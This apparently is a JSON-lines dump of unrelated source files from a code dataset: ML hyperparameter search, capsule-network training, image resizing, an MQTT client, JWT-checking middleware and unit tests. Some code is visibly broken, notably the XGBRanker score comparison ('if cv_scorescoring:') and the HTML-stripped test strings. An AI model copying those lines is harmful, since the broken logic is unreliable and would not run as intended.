+{"seq_id":"336457106","text":"import sys\nimport time\nfrom collections import Counter\nfrom multiprocessing import cpu_count\n\nimport numpy as np\nimport xgboost as xgb\nfrom sklearn.model_selection import StratifiedKFold, train_test_split\n\n\ndef RandomSearch(feature, label, group, metrics, iter_num=1000, scoring=0.5, cv=5, cv_num=3,\n metrics_min=True, speedy=True, speedy_param=(20000, 0.3), gpu=False):\n \"\"\"XGBRanker model params search use RandomSearch method.\n \n Args:\n feature: pandas dataframe, model's feature.\n label: pandas series, model's label.\n loss: XGBRanker param 'objective'.\n metrics: model metrics function.\n scoring: metrics error opt base line value.\n cv: cross validation fold.\n cv_num: minimum cross validation fold.\n metrics_min: metrics value whether the smaller the better.\n speedy: whether use speedy method.\n speedy_param: if use speedy method, test_size will be set, \n test_size = 1-round(min(speedy_param[0], feature.shape[0]*speedy_param[1])/feature.shape[0], 2).\n gpu: whether use gpu.\n Returns:\n a best XGBRanker model params dict.\n Raises:\n params error.\n \"\"\"\n start = time.time()\n if gpu:\n raise \"XGBRanker is not supported currently.\"\n best_params={}\n if speedy:\n test_size = 1-round(min(speedy_param[0], feature.shape[0]*speedy_param[1])/feature.shape[0], 2)\n tree_method = 'gpu_hist' if gpu else 'auto'\n n_job = 1 if gpu else int(np.ceil(cpu_count()*0.9))\n weight_dict = Counter(label)\n if len(weight_dict)==2:\n weight = int(np.ceil(weight_dict[min(weight_dict)]/weight_dict[max(weight_dict)]))\n else:\n weight_dict = {j:i for i,j in weight_dict.items()}\n weight = int(np.ceil(weight_dict[max(weight_dict)]/weight_dict[min(weight_dict)]))\n for i in range(1, iter_num+1):\n params = {'learning_rate': np.random.choice(np.linspace(0.01, 0.1, 10).round(2)),\n 'n_estimators': np.random.choice(list(range(100, 850, 50))),\n 'max_depth': int(np.random.choice(np.linspace(3, 7, 5))),\n 'min_child_weight': int(np.random.choice(np.linspace(1, 7, 7))),\n 'reg_alpha': np.random.choice(np.concatenate([np.linspace(0, 1, 101), np.linspace(2, 100, 99)]).round(2)),\n 'reg_lambda': np.random.choice(np.concatenate([np.linspace(0, 1, 101), np.linspace(2, 100, 99)]).round(2)),\n 'subsample': np.random.choice(np.linspace(0.5, 1, 6)).round(1),\n 'colsample_bytree': np.random.choice(np.linspace(0.5, 1, 6)).round(1),\n 'colsample_bylevel': np.random.choice(np.linspace(0.5, 1, 6)).round(1),\n 'gamma': np.random.choice(np.linspace(0, 0.6, 13)).round(0),\n 'max_delta_step': int(np.random.choice(np.linspace(0, 10, 11))),\n 'scale_pos_weight': int(np.random.choice(np.linspace(1, weight, weight))),\n 'n_jobs':n_job, 'random_state': 27, 'objective': 'rank:pairwise', 'tree_method':tree_method}\n model = xgb.XGBRanker(**params)\n score = []\n if speedy:\n for _ in range(cv_num):\n X_train, X_test, y_train, y_test, g_train, g_test = train_test_split(feature, label, group, \n test_size=test_size, stratify=label, \n random_state=np.random.choice(range(100), 1)[0])\n model.fit(X_train, y_train, g_train)\n cv_pred = model.predict(X_test)\n score.append(metrics(y_test.values, cv_pred))\n else:\n skf = StratifiedKFold(n_splits=cv, shuffle=True, random_state=np.random.choice(range(100), 1)[0])\n for n, (train_index, test_index) in enumerate(skf.split(feature, label)):\n if n == cv_num:\n break\n model.fit(feature.loc[train_index], label[train_index], group[train_index])\n cv_pred = model.predict(feature.loc[test_index])\n score.append(metrics(label[test_index].values, 
cv_pred))\n cv_score = round(np.mean(score), 4)\n if metrics_min:\n if cv_scorescoring:\n scoring = cv_score\n best_params = params.copy()\n sys.stdout.write(\"XGBRanker random search percent: {}%, run time {} min, best score: {}, best param:{}\\r\".format(\n round(i/iter_num*100,2), divmod((time.time()-start),60)[0], scoring, best_params))\n sys.stdout.flush()\n print(\"XGBRanker param finetuning with random search run time: %d min %.2f s\" % divmod((time.time() - start), 60))\n return best_params\n","sub_path":"linora/param_search/XGBRanker/_RandomSearch.py","file_name":"_RandomSearch.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"352616018","text":"import sys\nfrom struct import unpack\nmin = int(sys.argv[1])\nmax = int(sys.argv[2])\nlng = int(sys.argv[3])\nhash = [0] * lng\nwhile True:\n o = sys.stdin.read(4)\n if not len(o) == 4:\n break\n n = unpack(\"I\",o)[0]\n if (n >= min) and (n < max):\n i = int((lng*(n-min)/(float(max)-float(min))))\n hash[i] = (hash[i] + 1) % 10\n\nfor u in range(lng):\n sys.stdout.write(\"%s\" %(hash[u]))\nsys.stdout.write(\"\\n\")","sub_path":"radio/radiohash.py","file_name":"radiohash.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"80790644","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 8 20:42:03 2020\n\n@author: lwzjc\n\"\"\"\nimport numpy as np\nfrom tensorflow.keras import layers, models, optimizers\nfrom tensorflow.keras import backend as K\nimport tensorflow as tf\nfrom tensorflow.keras import callbacks\n#from keras.utils import to_categorical\nfrom Capsule import CapsuleLayer, PrimaryCap, Length, Mask\nfrom sklearn.metrics import accuracy_score, matthews_corrcoef,confusion_matrix\nfrom sklearn.utils import class_weight, shuffle, resample\n\n\ndef CapsNet(input_shape, n_class, num_routing, kernel_size=7):\n \"\"\"\n A Capsule Network on PDNA-543.\n :param input_shape: data shape, 3d, [width, height, channels],for example:[21,28,1]\n :param n_class: number of classes\n :param num_routing: number of routing iterations\n :return: A Keras Model with 2 inputs and 2 outputs\n \"\"\"\n x = layers.Input(shape=input_shape)\n\n # Layer 1: Just a conventional Conv2D layer\n conv1 = layers.Conv2D(filters=128, kernel_size=kernel_size, strides=1, padding='valid', activation='relu', name='conv1')(x)\n # Layer 2: Conv2D layer with `squash` activation, then reshape to [None, num_capsule, dim_vector]\n primarycaps = PrimaryCap(conv1, dim_vector=16, n_channels=32, kernel_size=kernel_size, strides=2, padding='valid')\n\n # Layer 3: Capsule layer. Routing algorithm works here.\n digitcaps = CapsuleLayer(num_capsule=n_class, dim_vector=32, num_routing=num_routing, name='digitcaps')(primarycaps)\n\n # Layer 4: This is an auxiliary layer to replace each capsule with its length. Just to match the true label's shape.\n # If using tensorflow, this will not be necessary. :)\n out_caps = Length(name='out_caps')(digitcaps)\n \n # Decoder network.\n y = layers.Input(shape=(n_class,))\n masked = Mask()([digitcaps, y]) # The true label is used to mask the output of capsule layer.\n x_recon = layers.Dense(512, activation='relu')(masked)\n x_recon = layers.Dense(1024, activation='relu')(x_recon)\n x_recon = layers.Dense(np.prod(input_shape), activation='sigmoid')(x_recon)\n x_recon = layers.Reshape(target_shape=input_shape, name='out_recon')(x_recon)\n\n # two-input-two-output keras Model\n return models.Model([x, y], [out_caps, x_recon])\n \n\ndef semisup_margin_loss(y_true, y_pred): \n m = K.sum(y_true, axis=-1)\n #return K.switch(K.equal(K.sum(y_true), 0), 0., K.sum(K.categorical_crossentropy(K.tf.boolean_mask(y_true,m), K.tf.boolean_mask(y_pred,m), from_logits=True)) / K.sum(y_true))\n t = tf.boolean_mask(y_true,m)\n p = tf.boolean_mask(y_pred,m)\n L = t * K.square(K.maximum(0.,0.9 - p)) + \\\n 0.5 * (1 - t) * K.square(K.maximum(0., p - 0.1))\n return K.switch(K.equal(K.sum(y_true), 0), 0., K.mean(K.sum(L, 1)))\n\ndef margin_loss(y_true, y_pred):\n \"\"\"\n Margin loss for Eq.(4). When y_true[i, :] contains not just one `1`, this loss should work too. 
Not test it.\n :param y_true: [None, n_classes]\n :param y_pred: [None, num_capsule]\n :return: a scalar loss value.\n \"\"\"\n L = y_true * K.square(K.maximum(0., 0.9 - y_pred)) + \\\n 0.5 * (1 - y_true) * K.square(K.maximum(0., y_pred - 0.1))\n\n return K.mean(K.sum(L, 1))\n\n\ndef train(model, data, args):\n \"\"\"\n Training a CapsuleNet\n :param model: the CapsuleNet model\n :param data: a tuple containing training and testing data, like `((x_train, y_train), (x_test, y_test))`\n :param args: arguments\n :return: The trained model\n \"\"\"\n # unpacking the data\n (x_train, y_train), (x_test, y_test) = data\n\n # callbacks\n log = callbacks.CSVLogger(args.save_dir + '/log.csv')\n tb = callbacks.TensorBoard(log_dir=args.save_dir + '/tensorboard-logs',\n batch_size=args.batch_size, histogram_freq=args.debug)\n checkpoint = callbacks.ModelCheckpoint(args.save_dir + '/weights-{epoch:02d}.h5',\n save_best_only=True, save_weights_only=True, verbose=1)\n lr_decay = callbacks.LearningRateScheduler(schedule=lambda epoch: args.lr * (0.9 ** epoch))\n\n # compile the model\n \"\"\"\n model.compile(optimizer=optimizers.Adam(lr=args.lr),\n loss=[margin_loss, 'mse'],\n loss_weights=[1., args.lam_recon],\n metrics={'out_caps': mcc})\n \"\"\"\n model.compile(optimizer=optimizers.Adam(lr=args.lr),\n loss=[semisup_margin_loss,'mse'],\n loss_weights=[1., args.lam_recon],\n metrics={'out_caps': \"accuracy\"})\n \n # Training without data augmentation:\n \n model.fit([x_train, y_train], [y_train, x_train], \n batch_size=args.batch_size, \n epochs=args.epochs,\n validation_data=[[x_test, y_test], [y_test, x_test]], \n callbacks=[log, tb, checkpoint, lr_decay])\n \"\"\"\n #cw = class_weight.compute_class_weight('balanced',np.unique(y_train), y_train)\n #cw = dict(enumerate(cw))\n model.fit(x_train, y_train, batch_size=args.batch_size, \n epochs=args.epochs,\n validation_data=[x_test, y_test], \n #class_weight=cw,\n callbacks=[log, tb, checkpoint, lr_decay])\n \"\"\"\n \"\"\"\n # Begin: Training with data augmentation ---------------------------------------------------------------------#\n def train_generator(x, y, batch_size, shift_fraction=0.):\n train_datagen = ImageDataGenerator(width_shift_range=shift_fraction,\n height_shift_range=shift_fraction) # shift up to 2 pixel for MNIST\n generator = train_datagen.flow(x, y, batch_size=batch_size)\n while 1:\n x_batch, y_batch = generator.next()\n yield ([x_batch, y_batch], [y_batch, x_batch])\n\n # Training with data augmentation. 
If shift_fraction=0., also no augmentation.\n model.fit_generator(generator=train_generator(x_train, y_train, args.batch_size, args.shift_fraction),\n steps_per_epoch=int(y_train.shape[0] / args.batch_size),\n epochs=args.epochs,\n validation_data=[[x_test, y_test], [y_test, x_test]],\n callbacks=[log, tb, checkpoint, lr_decay])\n # End: Training with data augmentation -----------------------------------------------------------------------#\n \"\"\"\n model.save_weights(args.save_dir + '/trained_model.h5')\n print('Trained model saved to \\'%s/trained_model.h5\\'' % args.save_dir)\n\n from utils import plot_log\n plot_log(args.save_dir + '/log.csv', show=True)\n\n return model\n\n\ndef test(model, data):\n x_test, y_test = data\n y_pred, x_recon = model.predict([x_test, y_test], batch_size=100)\n print('-'*50)\n y_p = np.argmax(y_pred, 1)\n y_t = np.argmax(y_test,1)\n print('Test Accuracy:', accuracy_score(y_t, y_p))\n print('Test mattews-corrcoef', matthews_corrcoef(y_t, y_p))\n return y_p\n \"\"\"\n import matplotlib.pyplot as plt\n from utils import combine_images\n from PIL import Image\n\n img = combine_images(np.concatenate([x_test[:50],x_recon[:50]]))\n image = img * 255\n Image.fromarray(image.astype(np.uint8)).save(\"real_and_recon.png\")\n print()\n print('Reconstructed images are saved to ./real_and_recon.png')\n print('-'*50)\n plt.imshow(plt.imread(\"real_and_recon.png\", ))\n plt.show()\n \"\"\"\n\ndef load_PDNA543_accXiaoInfo():\n from dataset543 import gen_PDNA543_accXiaoInfo\n testdatafile = 'PDNA543TEST_seqs_11.npz'\n traindatafile = 'PDNA543_seqs_11.npz'\n x_train_pos, x_train_neg = gen_PDNA543_accXiaoInfo(traindatafile)\n x_test_pos, x_test_neg = gen_PDNA543_accXiaoInfo(testdatafile)\n \n x_test = np.concatenate((x_test_pos, x_test_neg))\n y_test = np.zeros((x_test.shape[0],2))\n y_test[:x_test_pos.shape[0], 1] = 1\n y_test[x_test_pos.shape[0]:,0] = 1\n x_test = x_test.reshape(-1, x_test.shape[1], x_test.shape[2], 1).astype('float32')\n \n x_neg = resample(x_train_neg, n_samples=x_train_pos.shape[0], replace=False)\n x_train = np.concatenate((x_train_pos, x_neg))\n y_train = np.zeros((x_train.shape[0],2))\n y_train[:x_train_pos.shape[0], 1] = 1\n y_train[x_train_pos.shape[0]:, 0] = 1\n x_train = x_train.reshape(-1, x_train.shape[1], x_train.shape[2], 1).astype('float32')\n x_train,y_train = shuffle(x_train, y_train)\n \n return (x_train, y_train), (x_test, y_test)\n\ndef load_PDNA543_hhm():\n from dataset543 import gen_PDNA543_HHM,readPDNA543_hhm_sites\n \n (train_hhm, train_sites), (test_hhm, test_sites) = readPDNA543_hhm_sites()\n testdatafile = 'PDNA543TEST_HHM_15.npz'\n traindatafile = 'PDNA543_HHM_15.npz'\n x_test_pos, x_test_neg = gen_PDNA543_HHM(test_hhm, test_sites, testdatafile, ws=15)\n data = np.load(testdatafile, allow_pickle='True')\n x_test_pos, x_test_neg = data['pos'], data['neg']\n x_test = np.concatenate((x_test_pos, x_test_neg))\n y_test = np.zeros((x_test.shape[0],2))\n y_test[:x_test_pos.shape[0], 1] = 1\n y_test[x_test_pos.shape[0]:,0] = 1\n x_test = x_test.reshape(-1, x_test.shape[1], x_test.shape[2], 1).astype('float32')\n \n x_train_pos, x_train_neg = gen_PDNA543_HHM(train_hhm, train_sites, traindatafile, ws=15)\n data = np.load(traindatafile, allow_pickle='True')\n x_train_pos, x_train_neg = data['pos'], data['neg']\n x_neg = resample(x_train_neg, n_samples=x_train_pos.shape[0], replace=False)\n x_train = np.concatenate((x_train_pos, x_neg))\n y_train = np.zeros((x_train.shape[0],2))\n y_train[:x_train_pos.shape[0],1] = 1\n 
y_train[x_train_pos.shape[0]:,0] = 1\n x_train = x_train.reshape(-1, x_train.shape[1], x_train.shape[2], 1).astype('float32')\n x_train, y_train = shuffle(x_train, y_train)\n \n return (x_train, y_train), (x_test, y_test)\n\ndef load_test(testdatafile):\n data = np.load(testdatafile, allow_pickle='True')\n x_test_pos, x_test_neg = data['pos'], data['neg'] \n x_test = np.concatenate((x_test_pos, x_test_neg))\n y_test = np.zeros((x_test.shape[0],2))\n y_test[:x_test_pos.shape[0], 1] = 1\n y_test[x_test_pos.shape[0]:,0] = 1\n x_test = x_test.reshape(-1, x_test.shape[1], x_test.shape[2], 1).astype('float32')\n \n return (x_test, y_test)\n\ndef load_resampleTrain(traindatafile, neg_samples=0):\n data = np.load(traindatafile, allow_pickle='True')\n x_train_pos, x_train_neg = data['pos'], data['neg']\n if neg_samples == 0:\n neg_samples = x_train_pos.shape[0]\n x_neg = resample(x_train_neg, n_samples=neg_samples, replace=False)\n x_train = np.concatenate((x_train_pos, x_neg))\n y_train = np.zeros((x_train.shape[0],2))\n y_train[:x_train_pos.shape[0],1] = 1\n y_train[x_train_pos.shape[0]:,0] = 1\n x_train = x_train.reshape(-1, x_train.shape[1], x_train.shape[2], 1).astype('float32')\n x_train, y_train = shuffle(x_train, y_train)\n \n return (x_train, y_train)\n\ndef load_semisupTrain(traindatafile, neg_samples=0):\n data = np.load(traindatafile, allow_pickle='True')\n x_train_pos, x_train_neg = data['pos'], data['neg']\n if neg_samples == 0:\n neg_samples = x_train_pos.shape[0]\n x_neg = resample(x_train_neg, n_samples=neg_samples, replace=False)\n x_train = np.concatenate((x_train_pos, x_neg))\n y_train = np.zeros((x_train.shape[0], 2))\n y_train[:x_train_pos.shape[0], 1] = 1\n y_train[x_train_pos.shape[0] : 3 * x_train_pos.shape[0], 0] = 1\n x_train = x_train.reshape(-1, x_train.shape[1], x_train.shape[2], 1).astype('float32')\n x_train, y_train = shuffle(x_train, y_train)\n \n return (x_train, y_train)\n\"\"\"\ndef load_PDNA543_hhm_xiaoInfo():\n from dataset543 import gen_PDNA543_accXiaoInfo\n from dataset543 import gen_PDNA543_HHM,readPDNA543_hhm_sites\n\"\"\"\nif __name__ == \"__main__\":\n #import numpy as np\n import os\n #from keras.preprocessing.image import ImageDataGenerator\n #from keras.utils.vis_utils import plot_model\n\n # setting the hyper parameters\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', default=100, type=int)\n parser.add_argument('--epochs', default=15, type=int)\n parser.add_argument('--lam_recon', default=0.465, type=float) # 784 * 0.0005, paper uses sum of SE, here uses MSE\n parser.add_argument('--num_routing', default=9, type=int) # num_routing should > 0\n parser.add_argument('--shift_fraction', default=0.1, type=float)\n parser.add_argument('--debug', default=0, type=int) # debug>0 will save weights by TensorBoard\n parser.add_argument('--save_dir', default='./result/PDNA-543')\n parser.add_argument('--is_training', default=1, type=int)\n parser.add_argument('--weights', default=None)\n parser.add_argument('--lr', default=0.001, type=float)\n args = parser.parse_args()\n print(args)\n if not os.path.exists(args.save_dir):\n os.makedirs(args.save_dir)\n \n # load data\n #(x_train, y_train), (x_test, y_test) = load_PDNA543_hhm()\n traindatafile = '../PDNA543_HHM_11.npz'\n testdatafile = '../PDNA543TEST_HHM_11.npz' \n N = 9345*4\n (x_train, y_train) = load_semisupTrain(traindatafile,N)\n (x_test, y_test) = load_test(testdatafile)\n \n y_pred = np.zeros(shape=(y_test.shape[0],))\n ker=[3,5,7,9,11]\n for k in 
range(len(ker)):\n \n print(\"predictor No.{}:x_train.shape:{}\".format(k, x_train.shape))\n # define model\n model = CapsNet(input_shape=x_train.shape[1:],\n n_class=len(np.unique(np.argmax(y_train, 1))),\n num_routing=args.num_routing, kernel_size=ker[k])\n model.summary()\n #plot_model(model, to_file=args.save_dir+'/model.png', show_shapes=True)\n \n train(model=model, data=((x_train, y_train), (x_test, y_test)), args=args)\n \n y_p = test(model=model, data=(x_test, y_test))\n y_pred = y_pred + y_p\n K.clear_session()\n tf.reset_default_graph()\n #(x_train, y_train), (x_test, y_test) = load_PDNA543_hhm()\n (x_train, y_train) = load_semisupTrain(traindatafile,N)\n \n y_pred = y_pred/len(ker)\n y_p = (y_pred>0.5).astype(float)\n y_t = np.argmax(y_test,1)\n print('Test Accuracy:', accuracy_score(y_t, y_p))\n print('Test mattews-corrcoef', matthews_corrcoef(y_t, y_p))\n print('Test confusion-matrix', confusion_matrix(y_t, y_p))\n \"\"\"\n # train or test\n if args.weights is not None: # init the model weights with provided one\n model.load_weights(args.weights)\n if args.is_training:\n train(model=model, data=((x_train, y_train), (x_test, y_test)), args=args)\n else: # as long as weights are given, will run testing\n if args.weights is None:\n print('No weights are provided. Will test using random initialized weights.')\n test(model=model, data=(x_test, y_test))\n \"\"\"","sub_path":"bak/capsnet543.py","file_name":"capsnet543.py","file_ext":"py","file_size_in_byte":14797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"375586598","text":"import obraz,os,glob,Image\ntry:\n from urllib.request import pathname2url, url2pathname\nexcept ImportError:\n from urllib import pathname2url, url2pathname\n\ndef resize_jpg(basedir, destdir, site):\n\t\"\"\"Resizing large .jpgs in /attach dir.\"\"\"\n\t#should use url2pathname when opening files!\n\t\n\tattach_dir = glob.glob(os.getcwd() + '/attach/' + '*.jpg') + glob.glob(os.getcwd() + '/attach/' + '*.JPG')\n\t\n\tfor image in attach_dir:\n\t\tim = Image.open(image)\n\t\tw,h = im.size\t\t\t\t\t\t#Get image width and height\n\t\tif min(w,h)>2048:\t\t\t\t\t#Check if either dimension is smaller than 2048\n\t\t\tim.thumbnail((2048,2048), Image.ANTIALIAS)\t#Re-size Image\n\t\t\tw,h = im.size\t\t\t\t\t#update image size\n\t\t\tim.save(image, \"JPEG\")\n\nobraz.processors.insert(0, resize_jpg)","sub_path":"resizejpg.py","file_name":"resizejpg.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"399838789","text":"import paho.mqtt.client as mqtt\nimport time\n\n# CALLBACK FUNCTIONS\ndef on_log(client, userdata, level, buf):\n print(\"log: \"+buf)\n\ndef on_connect(client, userdata, flags, rc):\n if rc==0:\n print(\"connected OK\")\n else:\n print(\"Bad connection Returned code=\",rc)\n\ndef on_disconnect(client, userdata, flags, rc=0):\n print(\"Disconnected result code \"+str(rc))\n\ndef on_message(client,userdata,msg):\n topic=msg.topic\n m_decode=str(msg.payload.decode(\"utf-8\", \"ignore\"))\n print(\"Message received\",m_decode)\n print(\"Topic: \"+str(topic))\n\n# Set up CONNECTION VARIABLES\n# Set IP address of broker\n# broker = \"localhost\"\n# broker = \"test.mosquitto.org\"\nport = 1883\nbroker=\"169.254.238.24\"\n# broker=\"pi.local\"\n\n# Name the client within the arguement\nclient = mqtt.Client(\"Zy\")\n\n# Binding all callback functions\nclient.on_connect=on_connect\nclient.on_disconnect=on_disconnect\nclient.on_log=on_log\nclient.on_message=on_message\n\n# Setting up connection to the broker\nprint(\"Connecting to broker: \",broker)\nclient.connect(broker,port)\n\n# Loop needed for callback to work\nclient.loop_start()\n\n\n# SUBSCRIBE CODE\nclient.subscribe(\"smell123\")\n\nwhile(True):\n# PUBLISH CODE \n# ARGS:(topic, message)\n time.sleep(4)\n\n\n\nclient.loop_stop\nclient.disconnect()","sub_path":"extra_files/mqttSubscriber.py","file_name":"mqttSubscriber.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"5650531","text":"# Authors: Lukas Gemein \n#\n# License: BSD-3\n\nimport numpy as np\nimport pytest\n\nfrom braindecode.datautil.signalproc import (\n exponential_running_demean, exponential_running_standardize)\n\n\n@pytest.fixture(scope=\"module\")\ndef mock_data():\n np.random.seed(20200217)\n mock_input = np.random.rand(2, 10).reshape(2, 10)\n expected_standardized = np.array(\n [[ 0. , -1.41385996, -1.67770482, 1.95328935, 0.61618697,\n -0.55294099, -1.08890304, 1.04546089, -1.368485 , -1.08669994],\n [ 0. , -1.41385996, -0.41117774, 1.65212819, -0.5392431 ,\n -0.23009334, 0.15087203, -1.45238971, 1.88407553, -0.38583499]])\n expected_demeaned = np.array(\n [[ 0. , -0.02547392, -0.10004415, 0.47681459, 0.1399319 ,\n -0.11764405, -0.23535964, 0.22749205, -0.3155749 , -0.25316515],\n [ 0. , -0.29211105, -0.07138808, 0.44137798, -0.13274718,\n -0.0519248 , 0.03156507, -0.33137195, 0.52134583, -0.1020266 ]])\n return mock_input, expected_standardized, expected_demeaned\n\n\ndef test_exponential_running_standardize(mock_data):\n mock_input, expected_data, _ = mock_data\n standardized_data = exponential_running_standardize(mock_input)\n assert mock_input.shape == standardized_data.shape == expected_data.shape\n np.testing.assert_allclose(\n standardized_data, expected_data, rtol=1e-4, atol=1e-4)\n\n\ndef test_exponential_running_demean(mock_data):\n mock_input, _, expected_data = mock_data\n demeaned_data = exponential_running_demean(mock_input)\n assert mock_input.shape == demeaned_data.shape == expected_data.shape\n np.testing.assert_allclose(\n demeaned_data, expected_data, rtol=1e-4, atol=1e-4)\n\n\ndef test_exponential_running_init_block_size(mock_data):\n mock_input, _, _ = mock_data\n init_block_size = 3\n standardized_data = exponential_running_standardize(\n mock_input, init_block_size=init_block_size)\n np.testing.assert_allclose(\n standardized_data[:, :init_block_size].sum(), [0], rtol=1e-4, atol=1e-4)\n\n demeaned_data = exponential_running_demean(\n mock_input, init_block_size=init_block_size)\n np.testing.assert_allclose(\n demeaned_data[:, :init_block_size].sum(), [0], rtol=1e-4, atol=1e-4)\n","sub_path":"test/unit_tests/datautil/test_signalproc.py","file_name":"test_signalproc.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"593085726","text":"\nimport falcon\nimport utils\nfrom jose import jwt\nfrom jose.exceptions import JWTError\nfrom config import TOKEN_SECRET\nfrom config import TOKEN_ALGORITHM\nfrom datetime import datetime\n\nfrom model.business import BusinessModel\n\nclass TokenVerifier(object):\n\n def process_request(self, req, resp):\n freePaths = [\n \"/login-POST\",\n ]\n pathWithMethod = (req.path + \"-\" + req.method)\n\n if pathWithMethod in freePaths:\n return\n\n if req.auth is None or req.auth == '':\n raise utils.makeHttpStatus(200, \"TokenRequired\")\n\n try:\n result = jwt.decode(\n req.auth,\n TOKEN_SECRET,\n algorithms=[TOKEN_ALGORITHM])\n\n if 'expired_date' not in result:\n raise utils.makeHttpStatus(200, \"TokenInvalid\")\n\n today = datetime.now()\n expiredDate = datetime.utcfromtimestamp(result['expired_date'])\n if today > expiredDate:\n raise utils.makeHttpStatus(200, \"TokenExpired\")\n\n req.context[\"id_user\"] = result[\"id\"]\n req.context[\"role\"] = result[\"role\"]\n req.context[\"id_business\"] = result[\"id_business\"]\n\n except JWTError as ex:\n raise utils.makeHttpStatus(200, \"TokenInvalid\")\n","sub_path":"src/resources/tokenverifier.py","file_name":"tokenverifier.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"228477300","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\n PyLucid unittests\n ~~~~~~~~~~~~~~~~~\n \n :copyleft: 2010 by the PyLucid team, see AUTHORS for more details.\n :license: GNU GPL v3 or above, see LICENSE for more details.\n\"\"\"\n\nimport os\n\nif __name__ == \"__main__\":\n # run all unittest directly\n os.environ['DJANGO_SETTINGS_MODULE'] = \"pylucid_project.settings\"\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import AnonymousUser\n\nfrom pylucid_project.tests.test_tools import basetest\nfrom pylucid_project.apps.pylucid.models import PageTree, PageContent\nfrom pylucid_project.apps.pylucid.markup import MARKUP_HTML\n\n\nclass GenericTest(basetest.BaseLanguageTestCase):\n \"\"\"\n inherited from BaseUnittest:\n - initial data fixtures with default test users\n - self.login()\n \n inherited from BaseLanguageTest:\n - self.default_language - system default Language model instance (default: en instance)\n - self.default_language - alternative language code than system default (default: 'de')\n - self.other_language - alternative Language mode instance (default: de instance)\n - assertContentLanguage() - Check if response is in right language\n \"\"\"\n def _pre_setup(self, *args, **kwargs):\n super(GenericTest, self)._pre_setup(*args, **kwargs)\n\n pagetree = PageTree.objects.get_root_page(user=AnonymousUser())\n self.pagecontent = PageContent.objects.get(\n pagemeta__pagetree=pagetree, pagemeta__language=self.default_language\n )\n self.pagecontent.markup = MARKUP_HTML\n self.url = self.pagecontent.get_absolute_url()\n\n def setUp(self):\n self.old_DEBUG = settings.DEBUG\n settings.DEBUG = True\n\n def tearDown(self):\n settings.DEBUG = self.old_DEBUG\n\n def _set_content(self, text):\n self.pagecontent.content = (\n \"%(pre)s
\\n\"\n \"%(text)s\\n\"\n \"%(post)s
\"\n ) % {\n \"pre\": \"*\" * 80,\n \"text\": text,\n \"post\": \"^\" * 80,\n }\n self.pagecontent.save()\n\n def _test(self, lucidtag, must_contain):\n self._set_content(lucidtag)\n response = self.client.get(self.url)\n self.assertResponse(response,\n must_contain=must_contain,\n must_not_contain=(\n \"Traceback\", \"XXX INVALID TEMPLATE STRING\",\n \"Form errors\", \"field is required\",\n )\n )\n\n def test_youtube_basic(self):\n self._test(\n '{% lucidTag generic.youtube id=\"-VideoID-\" %}',\n must_contain=(\n '